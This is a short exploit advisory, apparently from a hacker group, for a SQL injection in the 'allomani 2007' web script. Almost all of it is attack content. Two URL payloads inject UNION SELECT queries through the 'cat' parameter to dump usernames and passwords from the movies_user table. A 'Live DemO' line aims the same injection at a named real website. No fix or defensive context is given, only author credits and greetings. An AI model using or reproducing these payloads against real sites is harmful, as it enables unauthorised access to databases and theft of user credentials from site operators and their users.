================== NaMe: allomani 2007 <= SQL Injection Vulnerability Author : NeX HackEr Contact: c2l@hotmail.com ================== Script site : http://allomani.com ================== ExplOiT: UserName http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user Password http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user :) ================== Live DemO: http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user +========================================================+ | | Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~ | And All Friends!!!! +========================================================+